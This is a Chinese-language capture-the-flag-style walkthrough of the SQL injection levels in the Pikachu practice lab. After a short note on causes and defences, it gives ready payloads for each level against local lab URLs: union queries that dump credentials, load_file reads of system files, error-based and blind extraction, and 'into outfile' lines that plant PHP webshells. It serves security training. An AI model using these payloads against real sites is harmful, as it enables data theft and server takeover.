1.Sql Inject(SQL注入)概述
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击
Sql 注入产生原因:
当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。
这种网站内部直接发送的Sql请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造 Sql 语句,如果用户输入的数据被构造成恶意 Sql 代码,Web 应用又未对动态构造的 Sql 语句使用的参数进行审查,则会带来意想不到的危险。
Sql 注入带来的威胁主要有如下几点:
猜解后台数据库,这是利用最多的方式,盗取网站的敏感信息。
绕过认证,列如绕过验证登录网站后台。
注入可以借助数据库的存储过程进行提权等操作
在构建代码时,一般会从如下几个方面的策略来防止SQL注入漏洞:
1.对传进SQL语句里面的变量进行过滤,不允许危险字符传入;
2.使用参数化(Parameterized Query 或 Parameterized Statement);
3.还有就是,目前有很多ORM框架会自动使用参数化解决注入问题,但其也提供了"拼接"的方式,所以使用时需要慎重!
2.数字型注入(post)
看题目,我们先选择查询id为1的用户
我们查看上方url,发现没有传参,说明其实post类型
这种时刻就该把bp请出来了,我们进行抓包
果然是post传参,将其发送到Repeater
找列数:id=1 order by n# &submit=%E6%9F%A5%E8%AF%A2,n为猜测的列数,如果猜测的列数大于select语句查询的结果的列数,会返回报错
比如,n为5时,就会报错。经过测试,列数为2
爆库:id=1 union select database(),2# &submit=%E6%9F%A5%E8%AF%A2
爆表:id=1 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2
爆列:id=1 union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='pikachu'# &submit=%E6%9F%A5%E8%AF%A2
爆数据:id=1 union select username,password from users# &submit=%E6%9F%A5%E8%AF%A2
读文件 :id=1 union select load_file('C:/Windows/win.ini'),1 from users#&submit=%E6%9F%A5%E8%AF%A2
写马:id=1 union select 1,'<?php assert($_POST[1]);?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/1.php'#&submit=%E6%9F%A5%E8%AF%A2
这里就不一一演示了嘿嘿
然后我们猜测sql语句为
select 字段1,字段2 from 表名 where id=1
我们再试试id=1 or 1=1&submit=%E6%9F%A5%E8%AF%A2,将其改为
select 字段1,字段2 from 表名 where id=1 or 1=1
上面其他语句也是同样的原理
在id=1后加上or 1=1试试
由此将所有用户信息显示出来!
3.字符型注入(get)
看题目,我们输入kobe
看上面url有显示,开始进行sql注入步骤:
查看源码,要用'来闭合
找列数:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' order by n%23&submit=%E6%9F%A5%E8%AF%A2
n为猜测的列数,payload中的%23就是#,由于在url中#有特殊含义所以要转义,前面的ip和路径根据自己搭建皮卡丘时的路径而定
原理和上一关一样,如果猜测的列数小于等于select语句查询结果的列数,会返回本关开始那张图,如果猜测的列数大于select语句查询结果的列数,会返回报错。
如,我们访问http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' order by 5%23&submit=%E6%9F%A5%E8%AF%A2,就会报错
最终发现查询结果列数为2
爆库:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,database()%23&submit=%E6%9F%A5%E8%AF%A2
爆表:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()%23&submit=%E6%9F%A5%E8%AF%A2
爆列:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,group_concat(column_name) from information_schema.columns where table_name='users'%23&submit=%E6%9F%A5%E8%AF%A2
爆数据:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select username,password from users%23&submit=%E6%9F%A5%E8%AF%A2
读文件:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,load_file('C:/Windows/win.ini')%23&submit=%E6%9F%A5%E8%AF%A2
写马:http://127.0.0.1/pk/vul/sqli/sqli_str.php?name=kobe' union select 1,'<?php assert($_POST[2]); ?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/2.php'%23&submit=%E6%9F%A5%E8%AF%A2
这里还是不演示了,就是这么个道理!
我们同样猜测此sql语句为:
select 字段1,字段2 from 表名 where username = 'kobe';
同样将它改为(用一个单引号将前面的单引号闭合):
select 字段1,字段2 from 表名 where username = 'kobe' or 1=1#';
输入:kobe' or 1=1#试试
同样将所有用户的信息显示出来!
4.搜索型注入
看题目说可以输入名字的一部分
我们只输个“k”,网页返回所有带k的,且上面同样有url显示
所以一些sql注入语句(找列数、爆库、爆表啥的),还是老套路
查看源码,这次用%'来闭合
找列数:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' order by n%23&submit=%E6%90%9C%E7%B4%A2
n仍为猜测的列数,同样,payload中的%23就是#,由于在url中#有特殊含义所以要转义,前面的ip和路径还是根据自己搭建皮卡丘时的路径而定
本次发现查询结果列数为3
爆库:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select database(),2,3%23&submit=%E6%90%9C%E7%B4%A2
爆表:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select group_concat(table_name),2,3 from information_schema.tables where table_schema=database()%23&submit=%E6%90%9C%E7%B4%A2
爆列:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'%23&submit=%E6%90%9C%E7%B4%A2
爆数据:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select username,password,level from users%23&submit=%E6%90%9C%E7%B4%A2
读文件:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select 1,2,load_file('C:/Windows/win.ini')%23&submit=%E6%90%9C%E7%B4%A2
写马:http://127.0.0.1/pk/vul/sqli/sqli_search.php?name=k%' union select 1,2,'<?php eval($_POST[3]);?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/3.php'%23&submit=%E6%90%9C%E7%B4%A2
这此猜测sql语句为:
select from 表名 where username like ' %k% ';
%代表没有或有多个字符,所以可对含有k的用户进行查询,我们再在改为(用%'来闭合):
select from 表名 where username like ' %k% ' or 1=1 #%';
输入k% ' or 1=1 #
所有用户的信息显示出来!
5.xx型注入
老样子老样子,输入kobe,发现上面同样有url显示
我们仍需考虑是什么闭合,查看源码发现相较于字符型注入,多了括号,所以这次用')来闭合
找列数:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') order by n%23&submit=%E6%9F%A5%E8%AF%A2
n:猜测的列数,说了无数遍了嗷!
爆库:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select database(),2%23&submit=%E6%9F%A5%E8%AF%A2
爆表:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select group_concat(distinct table_name),2 from information_schema.columns where table_schema='pikachu'%23&submit=%E6%9F%A5%E8%AF%A2
爆列:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select group_concat(column_name),2 from information_schema.columns where table_name=0x7573657273%23&submit=%E6%9F%A5%E8%AF%A2
爆内容:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select username,password from users%23&submit=%E6%9F%A5%E8%AF%A2
读文件:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select 1, load_file('c:/windows/win.ini')%23&submit=%E6%9F%A5%E8%AF%A2
写马:http://127.0.0.1/pk/vul/sqli/sqli_x.php?name=kobe') union select 1,'<?php assert($_POST[4]);?>' into outfile 'D:/phpStudy/WWW/pk/vul/sqli/4.php'%23&submit=%E6%9F%A5%E8%AF%A2
我们再输入') or 1=1#,同样是用')来闭合
所有用户信息!
6.insert/update注入
本关没有给出账号密码提示,我们点击注册
填好信息后,用bp抓包。从抓包结果看是post型的,除了submit之外有6个参数。
先是update注入,因为你得先注册才能修改信息吧
那就还得先了解一下updatexml()函数的用法:
语法:updatexml(xml document, XPathing, new_value)
第一个参数:XML_document是String格式,为XML文档对象的名称,也就是表中的字段名
第二个参数:XPath_string (Xpath格式的字符串)
第三个参数:new_value,String格式,替换查找到的符合条件的数据
那么怎么破解呢?跟上几关的思路不一样,本关是写一个报错注入,再报错回显时将我们想要得信息显示出来
回到注册界面,在用户栏写如下代码(注意闭合):
' or updatexml(1, concat(0x7e, database()), 0) or '
密码那些随便写,提交后得到以下界面
看起来是个报错,其实已经回显了数据库名
同理可以把database()改为其他函数来获得更多数据库信息
insert注入
我们注册好一个用户666并登录
点击修改个人信息,再在性别一栏输入刚才的代码:
' or updatexml(1, concat(0x7e, database()), 0) or '
提交后同样得到了数据库名
其他的爆表爆列啥的,就不写了哈
7.delete注入
随便输入一条留言666
再点击删除,同时用bp抓包,发现其是GET传参
send to repeater
之后在id=后输入如下代码将其闭合
1 or updatexml(1, concat(0x7e, database()), 0)
再将此段代码转换为特殊字符的url编码
改完后就是这个样子
最后send,就得到了数据库名(和上题一样,还是以报错的形式)
8."http header"注入
首先来了解一下什么是"http header"注入
有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证), 或者通过http header头信息获取客户端的一些资料,比如useragent、accept字段等,会对客户端的http header信息进行获取并使用SQL进行处理, 如果此时没有足够的安全考虑则可能会导致基于http header的SQL注入漏洞。
接下来看题目,按提示,我们用admin登录
刷新一下并用bp抓包
可以发现由上文提到的user agent
send to Repeater后,再修改user agent ,如下
' or updatexml(1,concat(0x7e, database()), 0) or '
最后send,成功得到数据库名(仍以报错的方式)
9.盲注(base on boolian布尔类型)
首先了解下盲注的概念
(1)盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。
通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。
(2)盲注又分为布尔类型和时间类型
什么情况下使用布尔类型的盲注?
**没有返回SQL执行的错误信息
**错误与正确的输入,返回的结果只有两种
什么情况下使用时间类型的盲注?
**页面上没有显示位和SQL语句执行的错误信息,正确执行和错误执行的返回界面一样,此时需要使用时间类型的盲注。
时间型盲注与布尔型盲注的语句构造过程类似,通常在布尔型盲注表达式的基础上使用IF语句加入延时语句来构造,由于时间型盲注耗时较大,通常利用脚本工具来执行,在手工利用的过程中较少使用。
接下来看题,本题为布尔类型
我们输入kobe' or 1=1#
再试试kobe' or 1=2#
可见,只有我们输入的条件为真时,才能输出正确信息
这次我们输入kobe' and length(database())=1#,显示您输入的username不存在.......
再把1换成2,以此类推,发现=7的时候,输出了正确信息
那么,我们就知道了数据库长度为7,同理,更换其他函数来测试其他数据
10.盲注(based on time)
本题就是基于时间类型的盲注了,题目不告诉你了嘛
上面说了,此种类型适用于无论输入是否正确,都返回相同数据,我们无法判断自己输入的条件是否为真,所以在后面加了一个时间限制
先向上题那样,输入kobe' and length(database())=7#
试试其他语句,我们发现 ,无论输入什么,回显的都是这句话
所以,我们这时就可以使用时间盲注了
输入kobe' and if(length(database())=7, sleep(1),5)#
意思为:若length(database())=7正确,延迟1秒返回:若不正确,延迟5秒返回
我们去测试,发现返回的虽然都是那句I don't care who you are!
但条件正确和不正确的回显时间不同,以此来判断哪个是正确条件
11.宽字节注入
还是先了解一下宽字节的原理
先了解一下什么是窄、宽字节已经常见宽字节编码:
**当某字符的大小为一个字节时,称其字符为窄字节.
**当某字符的大小为两个字节时,称其字符为宽字节.
**所有英文默认占一个字节,汉字占两个字节
**常见的宽字节编码:GB2312,GBK,GB18030,BIG5,Shift_JIS等
宽字节注入指的是 mysql 数据库在使用宽字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围),而且当我们输入单引号时,mysql会调用转义函数,将单引号变为’,其中\的十六进制是%5c,mysql的GBK编码,会认为%df%5c是一个宽字节,也就是’運’,从而使单引号闭合(逃逸),进行注入攻击。
接下来看题,我们随便输入一个用户123,用bp抓包发现其是post类型的
再send to Repeater
然后将name修改为如下代码(注意f后面有个单引号)
1%df' union select 1,2#
最后send一下,成功得到我们想要的信息!
终于写完了啊啊啊啊!
